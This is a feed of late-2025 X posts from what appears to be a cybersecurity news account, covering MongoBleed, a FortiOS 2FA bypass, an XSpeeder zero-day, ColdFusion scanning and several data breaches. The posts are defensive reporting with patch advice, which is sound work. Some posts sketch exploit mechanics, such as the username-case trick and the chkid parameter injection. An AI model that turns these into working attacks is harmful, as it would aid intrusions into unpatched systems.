X Link 2025-12-27T18:04Z [--] followers, [--] engagements
"🚨 MongoBleed PoC Drops: Unauthenticated MongoDB Memory Leak Now Easy to Exploit A new mongobleed PoC exploits CVE-2025-14847 by abusing MongoDBs zlib decompression handling (inflated uncompressedSize) to leak uninitialized heap memory over the network potentially exposing internal configs system stats paths and client details; patch to fixed MongoDB releases (e.g. 8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32) and watch for scanning on [-----]. 🕷 Malware: mongobleed (PoC exploit tool) 🎯 Target: Global/Database Infrastructure (MongoDB Cloud & Container Deployments) # Category: #MongoDB"
X Link 2025-12-27T18:08Z [--] followers, [---] engagements
"🚨 MongoBleed (CVE-2025-14847): Unauthenticated Heap-Memory Leak Hits MongoDB Servers MongoBleed abuses MongoDBs zlib compression handling to leak uninitialized heap memory to unauthenticated remote clients potentially exposing in-memory sensitive data and aiding follow-on exploitation. Patch to fixed MongoDB versions (e.g. 8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until upgraded. 🕷 Malware: N/A 🎯 Target: Global/Databases & Backend Infrastructure # Category: #MongoDB #MongoBleed #CVE202514847 #Vulnerability #InfoDisclosure #Zlib #DatabaseSecurity"
X Link 2025-12-28T04:09Z [--] followers, [---] engagements
"🚨 Rainbow Six Siege Breach Grants Billions of R6 Credits Forces Ubisoft Shutdown Attackers abused internal moderation/marketplace systems to ban/unban players spoof ban-ticker messages and grant 2B R6 Credits/Renown plus unlock cosmetics prompting Ubisoft to take Siege and the Marketplace offline and roll back transactions since 11:00 UTC. 🕷 Malware: N/A 🎯 Target: Global/Gaming (Ubisoft Rainbow Six Siege) # Category: #Ubisoft #RainbowSixSiege #CyberAttack #GameSecurity #AccountAbuse #IncidentResponse #SupplyChain 🔗 URL:"
X Link 2025-12-28T08:09Z [--] followers, [---] engagements
"🚨 Ubisoft Confirms Rainbow Six Siege Abuse After Breach Grants Billions of In-Game Credits Attackers reportedly compromised Sieges backend/admin tooling to mass-grant 2B R6 Credits/Renown issue bans/unbans and unlock cosmetics forcing Ubisoft to take servers and the Marketplace offline and roll back impacted transactions while investigating. The incident highlights how privileged tooling abuse (even without malware) can cause large-scale fraud and service disruption. 🕷 Malware: N/A 🎯 Target: Global/Gaming (Ubisoft Rainbow Six Siege) # Category: #Ubisoft #RainbowSixSiege #CyberAttack"
X Link 2025-12-28T10:09Z [--] followers, [----] engagements
"🚨 Security Affairs Newsletter Round 556: LangChain LangGrinch MongoDB CVE-2025-14847 and Trust Wallet Fallout This weekly roundup consolidates high-impact late-December threats including the LangChain-core serialization injection bug enabling secret theft MongoDBs unauthenticated heap-memory leak (CVE-2025-14847) and the Trust Wallet Chrome extension incident plus additional breach/hacktivism and supply-chain updates. Use it as a rapid triage list to prioritize patching credential rotation and monitoring for exploitation across common enterprise and developer stacks. 🕷 Malware: N/A 🎯"
X Link 2025-12-28T10:39Z [--] followers, [---] engagements
"🚨 Troy Hunt Weekly Update 484: IoT Shelly Nirvana Ubiquiti Physical-to-Digital Security and Travel Notes Troys latest weekly update recaps upcoming travel lessons learned while hardening a home IoT setup (Shelly ecosystem) and how physical security overlaps with network security using Ubiquitiuseful reminders that smart environments expand the attack surface across both physical and digital layers. 🕷 Malware: N/A 🎯 Target: Global/Infosec + IoT & Physical Security # Category: #ThreatIntel #IoT #PhysicalSecurity #Ubiquiti #HomeLab #SecurityAwareness #Cybersecurity 🔗 URL:"
X Link 2025-12-28T11:42Z [--] followers, [--] engagements
"🚨 MongoDB CVE-2025-14847: Unauthenticated Heap-Memory Leak via zlib Compression A MongoDB server-side zlib compression flaw can let unauthenticated clients trigger responses containing uninitialized heap memory risking exposure of sensitive in-memory data and accelerating follow-on exploitation; patch to fixed versions (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until upgraded. 🕷 Malware: N/A 🎯 Target: Global/Databases & Backend Infrastructure # Category: #MongoDB #CVE202514847 #Vulnerability #InfoDisclosure #Zlib #DatabaseSecurity #PatchManagement 🔗"
X Link 2025-12-29T10:12Z [--] followers, [--] engagements
"🚨 MongoBleed Exploited in the Wild: 87K Exposed MongoDB Servers at Risk of Secret Leakage Attackers are actively exploiting MongoBleed (CVE-2025-14847) to remotely leak uninitialized heap memory from MongoDB via zlib compressionpotentially exposing credentials API/cloud keys session tokens and internal configs from internet-exposed instances. Patch immediately (fixed builds available since Dec 19) and hunt for abnormal high-volume connections in MongoDB logs as exploitation can be stealthy and hard to see in SIEMs. 🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (MongoDB) #"
X Link 2025-12-29T10:16Z [--] followers, [--] engagements
"🚨 MongoBleed (CVE-2025-14847) Exploited After PoC Release 87K+ MongoDB Servers Exposed SecurityWeek reports threat actors began exploiting the unauthenticated MongoDB zlib flaw shortly after technical details and a PoC were released enabling remote leakage of uninitialized heap memory (session tokens passwords API keys). Patch to fixed MongoDB versions (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression and hunt logs for pre-auth exploitation attempts. 🕷 Malware: N/A 🎯 Target: Global/MongoDB Servers (Internet-Exposed) # Category: #MongoDB #MongoBleed"
X Link 2025-12-29T10:49Z [--] followers, [--] engagements
"🚨 Superagent: Open-Source Guardrails Framework to Control Agentic AI in Production Superagent helps teams run AI agents with enforced permissions runtime guardrails and full execution logging for auditability and incident response. A built-in Safety Agent evaluates prompts tool calls and outputs in real time against declarative policies to block or modify risky actions before they execute. 🕷 Malware: N/A 🎯 Target: Global/Enterprise (Agentic AI DevSecOps AppSec) # Category: #AgenticAI #AISecurity #LLMSecurity #Guardrails #DevSecOps #AppSec #OpenSource #Governance #Observability 🔗 URL:"
X Link 2025-12-29T10:55Z [--] followers, [--] engagements
"🚨 MongoBleed Detector Released: Offline Tool Spots CVE-2025-14847 Exploitation in MongoDB Logs An open-source agentless detector (by Neo23x0) scans MongoDB logs offline to flag MongoBleed exploitation by correlating connection/metadata/termination events (IDs 22943/51800/22944) and spotting the key anomaly: high-volume connections that never send client metadata. This matters because it enables rapid IR triage across many hosts (including rotated .gz logs) and prioritizes likely-active exploitation using severity thresholds (e.g. [---] conns 10% metadata 400/min bursts). 🕷 Malware: N/A 🎯"
X Link 2025-12-29T11:06Z [--] followers, [--] engagements
"🚨 MongoBleed Detector Released: Offline Log Scanner Flags CVE-2025-14847 Exploitation The new open-source MongoBleed detector scans MongoDB JSON logs offline to spot exploitation patterns by correlating connection accepted (22943) client metadata (51800) and connection closed (22944) eventsflagging high-volume bursts where attackers extract memory and disconnect without sending metadata. It supports compressed logs IPv4/IPv6 severity scoring (HIGH/MEDIUM/LOW/INFO) and optional SSH-based remote scanning to triage fleets quickly. 🕷 Malware: N/A 🎯 Target: Global/MongoDB Servers (4.48.2.2) #"
X Link 2025-12-29T11:13Z [--] followers, [--] engagements
"🚨 MongoBleed Exploited in the Wild: Pre-Auth MongoDB Memory Leak Exposes Secrets MongoDBs CVE-2025-14847 is now actively exploited letting unauthenticated attackers abuse zlib message decompression (length-field mishandling) to extract uninitialized heap memory that may contain credentials and other sensitive data from internet-exposed servers. Upgrade immediately to fixed releases (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until patched. 🕷 Malware: N/A 🎯 Target: Global/MongoDB Servers (Internet-Exposed) # Category: #MongoDB #MongoBleed #CVE202514847"
X Link 2025-12-29T11:20Z [--] followers, [--] engagements
"🚨 MongoBleed Exploited in the Wild: Pre-Auth MongoDB Memory Leak Exposes Secrets MongoDBs CVE-2025-14847 is now actively exploited letting unauthenticated attackers abuse zlib message decompression (length-field mishandling) to extract uninitialized heap memory that may contain credentials and other sensitive data from internet-exposed servers. Upgrade immediately to fixed releases (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until patched. 🕷 Malware: N/A 🎯 Target: Global/MongoDB Servers (Internet-Exposed) # Category: #MongoDB #MongoBleed #CVE202514847"
X Link 2025-12-29T13:20Z [--] followers, [--] engagements
"🚨 Fortinet Warns: 5-Year-Old FortiOS SSL-VPN 2FA Bypass Still Actively Exploited (CVE-2020-12812) Attackers can bypass FortiToken 2FA on vulnerable FortiGate SSL-VPN by changing the usernames letter case in specific local user + LDAP group configurations effectively authenticating without a second factor. Patch immediately (fixed FortiOS builds available since 2020) and remove unnecessary secondary LDAP groups / disable username case-sensitivity if you cannot upgrade. 🕷 Malware: N/A 🎯 Target: Global/Organizations Running FortiGate SSL-VPN with LDAP + 2FA # Category: #Fortinet #FortiOS"
X Link 2025-12-29T13:26Z [--] followers, [--] engagements
"🚨 Microsoft Copilot Adds GPT-5.2 as New Smart Plus Mode Microsoft is rolling out GPT-5.2 (a Thinking variant) in Copilot across web Windows and mobile as a free upgrade alongside GPT-5.1. The update aims to improve complex reasoning and knowledge-work tasks like document analysis coding and generating spreadsheets/presentations. 🕷 Malware: N/A (AI model rollout: GPT-5.2) 🎯 Target: Global/Productivity (Microsoft Copilot users) # Category: #Microsoft #Copilot #AI #GPT52 #GenAI #Windows #ProductUpdate 🔗 URL:"
X Link 2025-12-29T13:39Z [--] followers, [--] engagements
"🚨 Coupang Announces $1.17B Voucher Payout After 33.7M-Account Data Breach Coupang says an intrusion (discovered Nov 18) exposed customer PIIincluding names phone numbers delivery/email addresses and some order historiesimpacting up to [----] million Korea-based accounts. Starting Jan [--] [----] it will issue [-----] vouchers per affected user ($1.17B total) underscoring the scale of large-platform PII exposure and the business/regulatory fallout of voucher-based remediation. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce (Coupang customers) # Category: #DataBreach #Coupang #Privacy #PII"
X Link 2025-12-29T13:39Z [--] followers, [--] engagements
"🚨 Aflac Data Breach Exposes 22.65M Records After June [----] Intrusion Aflac says attackers accessed and exfiltrated data tied to [-----] million individuals after suspicious activity was detected on June [--] [----] impacting customers beneficiaries employees and agents; no ransomware encryption was observed. Stolen data includes SSNs DOB addresses drivers license/government IDs and medical/health insurance inforaising high identity-theft and medical-fraud risk and aligning with a broader campaign hitting the insurance sector. 🕷 Malware: N/A 🎯 Target: USA / Insurance # Category: #DataBreach"
X Link 2025-12-29T13:46Z [--] followers, [--] engagements
"🚨 Malware in [----] Breaks Out of Windows: Android Banking Trojans + macOS ClickFix Surge Malwarebytes reports 2025s malware shifted heavily to Android and macOShighlighting advanced Android banking trojans using overlays and human-like interaction tricks plus the ClickFix social-engineering technique spreading macOS stealers. The trend is accelerated by cross-platform malware built in Rust/Go and MaaS ecosystems expanding reach to mobile Linux and IoT. 🕷 Malware: Multiple (Herodotus Lumma AMOS Rhadamanthys) 🎯 Target: Global / Mobile & macOS Users # Category: #Malware #Android #macOS"
X Link 2025-12-29T13:48Z [--] followers, [--] engagements
"🚨 Check Point Weekly Threat Intel: Major Breaches Critical Vulns and Active Phishing/Malware Campaigns Check Points Dec [--] bulletin highlights disruptive incidents (ransomware encrypting Romanian Waters IT estate a La Poste outage claimed by NoName057(16) and Aflacs 22.7M-record breach) alongside high-impact flaws in MongoDB (MongoBleed) LangChain Core deserialization and Net-SNMP snmptrapd. It also flags active campaigns abusing Google Cloud Send Email workflows for credential phishing and long-running MgBot/Webrat activity delivered via DNS poisoning and fake GitHub PoCs. 🕷 Malware: MgBot"
X Link 2025-12-29T13:50Z [--] followers, [--] engagements
"🚨 Coupang Recovers Smashed Laptop Allegedly Used in Insider Data Breach Coupang says it recovered a smashed laptopreportedly weighted down and dumped in a riverlinked to an alleged insider leak and handed it to authorities as part of the investigation. The case underscores how insider access plus attempted evidence destruction can complicate breach containment attribution and legal response. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #InsiderThreat #DigitalForensics #IncidentResponse #EvidenceHandling #Coupang #SouthKorea 🔗 URL:"
X Link 2025-12-29T14:25Z [--] followers, [--] engagements
"🚨 Korean Air Employee Data Exposed After KC&D Supplier Hack Linked to Clop Korean Air disclosed that a breach at its catering partner KC&D exposed employee data stored in an ERP system including names and bank account numbers with local reporting suggesting [-----] records were exfiltrated. Clop has claimed responsibility and allegedly published the stolen data increasing risk of targeted fraud and impersonation attempts against staff. 🕷 Malware: Clop (ransomware/extortion gang) 🎯 Target: South Korea / Aviation (Employees) # Category: #DataBreach #KoreanAir #Clop #Extortion #OracleEBS"
X Link 2025-12-29T14:27Z [--] followers, [--] engagements
"🚨 [--] Threats That Shaped Cybersecurity in 2025: From Telecom Espionage to React2Shell Dark Reading outlines five defining threats: China-linked Salt Typhoons ongoing telecom intrusions major CISA budget/layoff impacts the critical React2Shell (CVE-2025-55182) deserialization flaw self-propagating open-source malware like Shai-Hulud and supply-chain-style attacks abusing Salesforce integrations and OAuth tokens. 🕷 Malware: Shai-Hulud 🎯 Target: Global / Enterprise (Telecom + SaaS ecosystems) # Category: #ThreatIntel #SaltTyphoon #APT #CISA #React2Shell #CVE2025-55182 #Vulnerability"
X Link 2025-12-29T14:29Z [--] followers, [--] engagements
"🚨 Fortinet Warns of New Attacks Exploiting Old FortiOS 2FA Bypass (CVE-2020-12812) Fortinet reports renewed exploitation of CVE-2020-12812 where attackers can bypass FortiOS two-factor authentication in certain LDAP/remote-auth configurations by altering username case to avoid the 2FA prompt. This matters because it enables account compromise of FortiGate access paths (often internet-exposed) accelerating follow-on intrusion activity if admins havent patched or hardened affected setups. 🕷 Malware: N/A 🎯 Target: Global / Enterprise (FortiOS/FortiGate deployments) # Category: #Fortinet"
X Link 2025-12-29T14:32Z [--] followers, [--] engagements
"🚨 MongoBleed Exploited in the Wild: 87K+ MongoDB Servers Potentially Exposed Researchers report active exploitation of MongoBleed (CVE-2025-14847) a zlib decompression flaw that lets unauthenticated attackers leak uninitialized heap memory from MongoDBrisking exposure of secrets like credentials tokens and API keys. Patch immediately (fixed builds include 8.2.3/8.0.17/7.0.28/6.0.27/5.0.32/4.4.30) or disable zlib compression as a short-term mitigation. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / MongoDB (exposed database servers) # Category: #MongoDB #MongoBleed #CVE2025_14847"
X Link 2025-12-29T14:34Z [--] followers, [--] engagements
"🚨 K3 UltraMulti EDC Keychain Tool Review: Flashlight + UV + Laser + Igniter in a Pocket Gadget A compact (40g) keychain tool combining an 800-lumen beam 365nm UV red laser side flood/RGB lights magnetic mount/clip USB-C recharge and a short-duration ignition module. The main value is always-on-you utility but treat the igniter and laser as safety/compliance considerations depending on your environment. 🕷 Malware: N/A 🎯 Target: Global / Consumer EDC # Category: #EDC #Multitool #Flashlight #UVLight #LaserPointer #EverydayCarry #Gadgets 🔗 URL:"
X Link 2025-12-29T18:43Z [--] followers, [--] engagements
"🚨 Korean Air Employee Data Exposed After KC&D Supplier Breach Linked to Clop Korean Air says its former catering/duty-free unit KC&D was hacked leaking employee data (including names and bank account numbers) from an ERP server with [-----] staff potentially affected. Clop has claimed responsibility reinforcing how third-party compromises can quickly translate into high-risk fraud and impersonation exposure for employees. 🕷 Malware: Clop (ransomware/extortion gang) 🎯 Target: South Korea / Aviation (Employees) # Category: #DataBreach #KoreanAir #Clop #ThirdPartyRisk #SupplyChainAttack #ERP"
X Link 2025-12-29T18:45Z [--] followers, [--] engagements
"🚨 Weekly Recap: MongoDB Attacks Wallet Breaches Android Spyware Insider Crime & More This weekly recap rounds up late-2025 threats including active exploitation of MongoDB MongoBleed (CVE-2025-14847) a Trust Wallet Chrome extension compromise Evasive Panda DNS poisoning to deliver MgBot and renewed FortiOS 2FA-bypass abuseshowing how attackers are chaining old flaws SaaS keys and supply-chain exposure faster than defenders patch. 🕷 Malware: MongoBleed (CVE-2025-14847) MgBot 🎯 Target: Global / Multi-sector # Category: #ThreatIntel #MongoDB #MongoBleed #CVE2025_14847 #TrustWallet"
X Link 2025-12-29T18:51Z [--] followers, [---] engagements
"🚨 Linux & Open Source [----] Outlook: Desktop Growth Rust Momentum and a Firefox Cliff The article forecasts continued Linux desktop growth in [----] stronger open-source security and wider use of AI to assist (not replace) Linux kernel developmentwhile warning Firefox faces serious pressure. This matters because rising adoption and supply-chain complexity will force faster hardening better maintenance and clearer trust signals across core open-source projects. 🕷 Malware: N/A 🎯 Target: Global / Linux & Open Source Ecosystem # Category: #Linux #OpenSource #Cybersecurity #Rust #DesktopLinux #AI"
X Link 2025-12-29T18:52Z [--] followers, [--] engagements
"🚨 Critical XSpeeder 0-Day (CVE-2025-54322) Exposes 70K Edge Devices as Vendor Stays Silent Researchers disclosed an unauthenticated 0-day in XSpeeder SXZOS where injecting payloads into the chkid parameter of can yield remote command execution with full root control. With no patch after 7+ months of disclosure attempts and [-----] devices exposed online this enables rapid network takeover traffic interception and disruption in industrial/branch environments. 🕷 Malware: CVE-2025-54322 (XSpeeder SXZOS 0-day RCE) 🎯 Target: Global / Industrial & Branch Networks (Routers SD-WAN Edge devices) #"
X Link 2025-12-29T18:54Z [--] followers, [--] engagements
"🚨 Trust Wallet: [----] Wallets Drained After Malicious Chrome Extension Update Attackers compromised Trust Wallet's Chrome extension v2.68.0 by injecting malicious JavaScript that exfiltrated wallet data, leading to roughly $7M stolen from [----] wallet addresses. Trust Wallet urges immediate updates to v2.69, warns of follow-on phishing scams and says it is reimbursing verified victims. 🕷 Malware: Malicious Trust Wallet Chrome extension v2.68.0 (JS data exfiltration) 🎯 Target: Global / Crypto users (Chrome extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension"
X Link 2025-12-29T18:58Z [--] followers, [--] engagements
"🚨 ChatGPT Mobile Adds Thinking Time Toggle for Standard vs Extended Reasoning OpenAI is rolling out a mobile update that finally lets Plus users choose between Standard and Extended Thinking, aligning the Android experience with desktop for deeper, longer reasoning on complex prompts. The change matters because it makes "more compute when needed" a user-controlled setting on mobile, reducing silent downgrades and improving output consistency across devices. 🕷 Malware: N/A 🎯 Target: Global / AI Productivity (ChatGPT mobile users) # Category: #OpenAI #ChatGPT #MobileSecurity #AI #LLM"
X Link 2025-12-29T19:00Z [--] followers, [--] engagements
"🚨 Top US Accounting Firm Sax Discloses [----] Breach Impacting 220000+ Sax LLP says hackers accessed its network in late July/August [----] and stole files affecting [------] people, with exposed data potentially including SSNs, DOB, driver's license/state IDs and passport numbers. The 16-month disclosure delay increases identity-theft risk because stolen PII is typically monetized quickly. 🕷 Malware: N/A 🎯 Target: USA / Accounting & Advisory (Clients/Individuals) # Category: #DataBreach #PII #IdentityTheft #Accounting #US #IncidentResponse #RiskManagement 🔗 URL:"
X Link 2025-12-29T19:05Z [--] followers, [--] engagements
"🚨 Hacker Dumped MacBook in River to Destroy Evidence in Coupang Data Theft Case Investigators say a former Coupang employee attempted to destroy evidence of a major data-theft incident by throwing a MacBook Air into a river, but authorities recovered the device for forensic analysis. The case underscores how insider access plus attempted evidence destruction can complicate attribution, containment and legal response. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #InsiderThreat #DigitalForensics #IncidentResponse #EvidenceHandling #Coupang 🔗 URL:"
X Link 2025-12-29T19:07Z [--] followers, [--] engagements
"🚨 2.5M+ Exploit Attempts Slam Adobe ColdFusion Servers in Holiday Attack Wave Researchers observed a coordinated campaign firing 2.5+ million malicious requests, timed heavily on Christmas Day, probing Adobe ColdFusion and [--] other stacks across [---] vulnerabilities. The actors used out-of-band callbacks (Interactsh) and targeted multiple ColdFusion RCE/bypass CVEs (e.g. CVE-2023-26359, CVE-2023-38205, CVE-2023-44353), consistent with initial-access-broker style scanning to quickly identify systems for follow-on compromise. 🕷 Malware: N/A (ProjectDiscovery Interactsh OAST + exploit-scanning) 🎯"
X Link 2025-12-29T19:07Z [--] followers, [--] engagements
"🚨 Critical XSpeeder SXZOS Zero-Day RCE Exposes 70000+ Internet-Facing Network Devices A pre-auth zero-day (CVE-2025-54322) in XSpeeder SXZOS networking devices enables unauthenticated attackers to execute arbitrary commands as root via a vulnerable web auth endpoint that unsafely eval()s base64-decoded input. With no patch available and tens of thousands of exposed hosts (common in industrial/branch environments), this is a high-probability mass-exploitation risk for initial access and full device takeover. 🕷 Malware: CVE-2025-54322 (XSpeeder SXZOS pre-auth Root RCE) 🎯 Target: Global /"
X Link 2025-12-29T19:38Z [--] followers, [--] engagements
"🚨 Airoha Bluetooth Headphone Flaws Let Attackers Hijack Paired Smartphones Three bugs (CVE-2025-20700/20701/20702) in Airoha's RACE protocol allow nearby attackers to connect without authentication, gain arbitrary memory read/write and extract the Bluetooth link key to impersonate trusted headphones. This can enable call/audio hijacking, contact/call-log access and voice-assistant abuse on connected phones. 🕷 Malware: Airoha RACE protocol vulnerabilities (CVE-2025-20700, CVE-2025-20701, CVE-2025-20702) 🎯 Target: Global / Bluetooth Headphones & Connected Smartphones # Category: #Bluetooth"
X Link 2025-12-29T19:40Z [--] followers, [--] engagements
"🚨 Ubisoft Confirms Rainbow Six Siege Server Intrusion Tied to MongoBleed (CVE-2025-14847) Attackers exploited the MongoBleed MongoDB memory-disclosure flaw to tamper with Rainbow Six Siege infrastructure, triggering mass account manipulation (credits/skins), ban-system abuse and service disruption. Reports also indicate follow-on actors may have leveraged the same weakness to steal large volumes of internal data, escalating long-term IP and cheat-development risk. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / Gaming (Ubisoft Rainbow Six Siege) # Category: #Ubisoft #RainbowSixSiege"
X Link 2025-12-29T19:44Z [--] followers, [---] engagements
"🚨 AI-Powered Mycelial Mage Phishing Kit Targets Microsoft Outlook Credentials A Spanish-language phishing kit dubbed Mycelial Mage is stealing Outlook logins, enriching them with IP/geolocation and exfiltrating via Telegram bots and, increasingly, via Discord webhooks to reduce forensic visibility. The toolkit also adds anti-analysis defenses (devtools traps, console hijacking, regex backtracking) and shows signs of AI-assisted module development. 🕷 Malware: Mycelial Mage (phishing kit) 🎯 Target: Global / Microsoft Outlook users (Spanish-speaking regions) # Category: #Phishing #CredentialTheft"
X Link 2025-12-29T19:46Z [--] followers, [--] engagements
"🚨 OpenAI Hardens ChatGPT Atlas to Resist Prompt-Injection Attacks OpenAI rolled out a security update for its browser-based ChatGPT Atlas agent that combines an adversarially trained model with stronger safeguards to detect and block prompt-injection attempts. The company is also scaling automated reinforcement-learning red teaming to discover novel multi-step attack strategies early and ship mitigations faster. 🕷 Malware: N/A 🎯 Target: Global / AI Agents (Browser-based automation) # Category: #OpenAI #ChatGPT #Atlas #PromptInjection #AgenticAI #AIsecurity #RedTeaming #AppSec 🔗 URL:"
X Link 2025-12-29T19:51Z [--] followers, [--] engagements
"🚨 2.5M+ Holiday Exploit Probes Hit Adobe ColdFusion in Coordinated Recon Campaign A threat actor ran a Christmas-week scanning operation generating 2.5M+ malicious requests across 47+ platforms, including [----] ColdFusion-focused requests across [--] countries (68% of sessions in the U.S.). The campaign abused WDDX deserialization to trigger JNDI/LDAP injection (JdbcRowSetImpl gadget chain) and used Interactsh/OAST domains for callback verification, classic initial-access-broker recon ahead of downstream intrusions. 🕷 Malware: N/A (Exploit-scanning; Interactsh/Nuclei-like tooling) 🎯 Target:"
X Link 2025-12-29T19:55Z [--] followers, [--] engagements
"🚨 Bluetooth Headphone Flaws Let Attackers Hijack Connected Smartphones Researchers disclosed three Airoha SoC issues (CVE-2025-20700/20701/20702) that allow nearby attackers to access the RACE protocol without proper authentication, then extract the Bluetooth Link Key and impersonate trusted headphones to abuse the paired phone. This can enable covert eavesdropping and actions like call/audio hijack and voice-assistant abuse across popular brands. 🕷 Malware: N/A (Airoha RACE protocol vulnerabilities: CVE-2025-20700, CVE-2025-20701, CVE-2025-20702) 🎯 Target: Global / Bluetooth Headphones &"
X Link 2025-12-29T19:57Z [--] followers, [--] engagements
"🚨 Hacktivist Proxy Ops Become a Repeatable Playbook for Geopolitical Cyber Pressure Report highlights a repeatable model where hacktivist campaigns surge immediately after geopolitical triggers (sanctions, military aid, diplomatic events), using low-complexity DDoS/defacement/claimed leaks to maximize public disruption and plausible deniability. The risk is sustained operational and psychological pressure on public-facing services (gov, finance, transport, media) that forces reactive defense and drains IR capacity. 🕷 Malware: N/A 🎯 Target: Global / Government & Critical Services # Category:"
X Link 2025-12-29T19:59Z [--] followers, [--] engagements
"🚨 Coupang Data Breach Suspect Dumped MacBook in River Investigators Recovered It The suspected actor behind Coupang's personal data leak allegedly threw a MacBook Air into a river to destroy evidence, but it was recovered and is being used for forensic investigation. The case highlights how insider-driven breaches often include anti-forensics, making rapid evidence preservation critical for attribution and legal action. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #Coupang #InsiderThreat #DigitalForensics #IncidentResponse #EvidenceHandling #SouthKorea 🔗 URL:"
X Link 2025-12-29T20:02Z [--] followers, [--] engagements
"🚨 Aflac Data Breach Exposes 22M People in Major Cyber Breach Aflac confirmed a June [----] intrusion impacted [--] million people, exposing sensitive PII and medical/claims-related data across customers, employees, agents and beneficiaries. The company says it contained the attack quickly and is offering impacted individuals two years of identity/medical-fraud protection services. 🕷 Malware: N/A 🎯 Target: USA / Insurance # Category: #DataBreach #Aflac #PII #HealthData #IdentityTheft #MedicalFraud #IncidentResponse #Cybercrime 🔗 URL:"
X Link 2025-12-29T22:08Z [--] followers, [--] engagements
"🚨 AI Slop and Brainrot Are Flooding YouTube Shorts, and the Algorithm Is Rewarding It A Kapwing analysis found that roughly [--] in [--] Shorts shown to new users qualifies as low-quality AI-generated slop, while about a third of early recommendations fall into brainrot attention-farming content. The report argues the incentives (cheap production + reliable reach) are accelerating spam-like content factories, degrading discovery quality and increasing misinformation risk at scale. 🕷 Malware: N/A 🎯 Target: Global / Social Media (YouTube) # Category: #AISlop #Brainrot #YouTubeShorts #ContentIntegrity"
X Link 2025-12-29T22:13Z [--] followers, [--] engagements
"🚨 Ubisoft Shuts Down Rainbow Six Siege After MongoDB Exploit Hits Players Attackers abused the MongoBleed MongoDB memory-leak flaw to compromise Rainbow Six Siege backend systems, enabling disruptive actions like mass credit grants, bans/unbans and in-game manipulation. The incident shows how a single internet-exposed database weakness can translate into full platform-level takeover and large-scale user impact. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / Gaming (Ubisoft Rainbow Six Siege players) # Category: #Ubisoft #RainbowSixSiege #MongoDB #MongoBleed #CVE2025_14847 #Exploit"
X Link 2025-12-29T22:50Z [--] followers, [---] engagements
"🚨 Coupang to Pay $1.1B in Vouchers After Massive Customer Data Breach Coupang announced a 1.685T ($1.1B) voucher compensation plan for 33.7M notified accounts after a major personal data exposure, with distribution starting January [--] [----]. The move underscores the scale of breach fallout in large consumer platforms, where remediation costs, regulatory scrutiny and trust erosion can exceed the technical incident itself. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #Coupang #Privacy #PII #SouthKorea #Ecommerce #IncidentResponse 🔗 URL:"
X Link 2025-12-29T22:52Z [--] followers, [--] engagements
"🚨 Elevation Lab TimeCapsule Review: Give AirTags a 5-Year Battery Without the Bulk Elevation Lab's compact TimeCapsule replaces the AirTag's CR2032 with AAA lithium cells in an IP69-sealed case, extending battery life to [--] years while keeping the tracker usable for travel/gear tracking. The tradeoff is slightly reduced speaker volume, but it materially lowers "battery died at the worst time" risk for long-term asset tracking. 🕷 Malware: N/A 🎯 Target: Global / Consumer Tracking (Apple AirTag users) # Category: #Apple #AirTag #Security #AssetTracking #Privacy #Bluetooth #Gadgets #Review 🔗 URL:"
X Link 2025-12-29T22:56Z [--] followers, [--] engagements
"🚨 MongoBleed Exploitation Spreads as Defenders Race to Patch MongoDB CyberScoop reports MongoBleed (CVE-2025-14847), a zlib-driven unauthenticated memory leak in widely deployed MongoDB versions, is now under active exploitation, with CISA adding it to KEV after a public PoC dropped Dec [--]. With tens of thousands of exposed instances (Shadowserver 75K; Censys 87K) and a bleed-style low-forensic footprint, stolen secrets (credentials/tokens) can enable rapid lateral movement and follow-on compromise. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / Cloud & Internet-Exposed MongoDB #"
X Link 2025-12-29T22:59Z [--] followers, [---] engagements
"🚨 Gentlemen Ransomware Disrupts Romania's Oltenia Energy Complex A ransomware attack on Dec [--] encrypted files and knocked key business IT services offline (ERP, document management, email, website) at Romania's largest coal power producer, while the national energy supply was not impacted. The company isolated affected systems, notified authorities and is restoring from backups as it investigates potential data theft. 🕷 Malware: Gentlemen ransomware 🎯 Target: Romania / Energy # Category: #Ransomware #Gentlemen #Romania #Energy #CriticalInfrastructure #IncidentResponse #BCP #CyberCrime 🔗 URL:"
X Link 2025-12-29T23:01Z [--] followers, [--] engagements
"🚨 US & Australia Confirm Active Exploitation of MongoBleed (CVE-2025-14847) US CISA and Australia's ACSC warn attackers are actively exploiting MongoBleed, a MongoDB zlib-related memory disclosure bug that can leak sensitive data (e.g. database passwords, cloud secrets) from vulnerable internet-exposed deployments. CISA added it to the KEV catalog and set a federal patch deadline of Jan [--], signaling high-confidence real-world abuse. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / MongoDB (internet-exposed databases; cloud environments) # Category: #MongoDB #MongoBleed #CVE2025_14847"
X Link 2025-12-29T23:05Z [--] followers, [---] engagements
"🚨 Coupang to Split $1.17B in Vouchers After 33.7M-Account Data Breach Coupang will begin issuing four single-use vouchers totaling [-----] won ($34) per affected user starting Jan [--] [----], after a breach discovered in mid-November that originated on June [--] and exposed Korean customers' PII (names, emails, addresses, order info). Investigators say the suspect retained data from [----] accounts and even dumped a MacBook Air in a river to destroy evidence, underscoring insider-risk and forensic challenges at scale. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #Coupang #PII"
X Link 2025-12-29T23:07Z [--] followers, [--] engagements
